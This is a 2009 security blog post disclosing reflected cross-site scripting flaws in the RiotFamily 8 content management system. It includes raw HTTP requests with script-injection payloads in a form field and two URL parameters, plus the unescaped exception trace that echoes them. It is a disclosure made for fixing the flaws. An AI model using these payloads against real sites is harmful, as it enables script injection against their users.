AntiSnatchOr.com - Keep It Simple Stupid

  • about
  • services
  • security advisories
  • contact
  • publications
  • my books
Home › Blogs › antisnatchor's blog

RiotFamily release 8 XSS

antisnatchor — 10 March, 2009 - 20:47

After a few months of security research inactivity, due to lack of time, I'm back guys. In these days I'm playing with RiotFamily (release 8.0), a powerful JEE based Content Management System developed by Felix Gnass and open to the public. It is based on rock-stable technologies that we all use developing Java based web apps, such as Spring, Hibernate, Freemarker, and DWR for Ajax. They made a lot of improvement from the previous version 7, especially in the admin backend. Well I have the time to run it locally on my Tomcat instance and play a bit lookin for security issues...here we go: 1. Reflected XSS in <yourApp>/riot/form/riotUser when adding a new user to the Riot backend. Following the row request complete with the trivial attack vector I've used: 
POST /riot8/riot/form/riotUser HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) 
Gecko/2009010711 Gentoo Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8080/riot8/riot/form/riotUser
Cookie: JSESSIONID=DE70D674365E74CDAD6CA176747FD244;
Content-Type: multipart/form-data; boundary=------------------
---------169054938890117057438849259
Content-Length: 838
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="id"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="name"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="email"
aaa@aal.lo
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3-confirm"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="sites"
1f67g<sCript>alert(666)</ScriPt>74jhskm3
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p5"
Save
-----------------------------169054938890117057438849259--
as you can see we've modified the original POST request (the one to add a user to the DB) injecting after the value 1 of the form part "sites " (a normal checkbox) a malicious (even if only to test purposes) JavaScript payload that shows a 666 popup. It works even throwing a java.lang.NumberFormatException. This is basically the same problem I've found in Eclipse BIRT a few months ago (now fixed): the Exception trace is not escaped for HTML characters, as you can see here: 
java.lang.NumberFormatException: For input string: 
"1f67g<sCript>alert(666)</ScriPt>74jhskm3"
 at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
 at java.lang.Integer.parseInt(Integer.java:456)
 at java.lang.Integer.parseInt(Integer.java:497)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement
.updateSelection(AbstractMultiSelectElement.java:161)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement
.processRequest(AbstractMultiSelectElement.java:141)
 at org.riotfamily.forms.CompositeElement.processRequestCompontents(CompositeElement
.java:142)
 at org.riotfamily.forms.CompositeElement.processRequest(CompositeElement.java:131)
 at org.riotfamily.forms.Form.processRequest(Form.java:396)
 at org.riotfamily.forms.Form.processRequest(Form.java:387)
 at org.riotfamily.forms.controller.AbstractFormController
.processForm(AbstractFormController.java:239)
 at org.riotfamily.forms.controller.AbstractFormController
.handleFormRequest(AbstractFormController.java:132)
 at org.riotfamily.forms.controller.AjaxFormController
.handleFormRequest(AjaxFormController.java:69)
 at org.riotfamily.forms.controller.AbstractFormController
.handleRequest(AbstractFormController.java:123)
Same problem in the path servlet request URI, in the objectId and subPage parameters: 
GET /riot8/riot/path?editorId=messageBundleEntry
              &objectId=1o92<script>alert(1)</script>73j HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5)
 Gecko/2009010711 Gentoo Firefox/3.0.5
[..] 
GET /riot8/riot/path?editorId=dbMessages
     &subPage=importMessagesac210<script>alert(1)</script>748djna HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) 
Gecko/2009010711 Gentoo Firefox/3.0.5
Have fun guys... euronymous
  • Research
  • antisnatchor's blog
  • Add new comment

[...] That’s what did Felix

RiotFamily release 8 XSS: fast fix!!! | AntiSnatch0r (not verified) — 11 March, 2009 - 15:44

[...] That’s what did Felix Gnass, the lead developer of RiotFamily, in which we have found security issues. [...]

  • reply

Recent blog posts

  • BeEF on OpenBSD
  • Meet BeEF at DeepSec 2011
  • My BeEF talk at CONFidence 2011
  • JBoss JMX Deploy Exploit
  • Enumerate potential DOM-based XSS vulnerable code
  • I will speak at Confidence 2011
  • DotCloud Beta Multiple Vulnerabilities
  • OpenCMS <= 7.5.3 multiple vulnerabilities
  • OpenCMS public vuln disclosure at the end of March
  • Drupal <= 6.20 insecure Captcha defaults PoC
more

Who's online

There are currently 0 users and 1 guest online.

Powered by Drupal, an open source content management system
  • about
  • services
  • security advisories
  • contact
  • publications
  • my books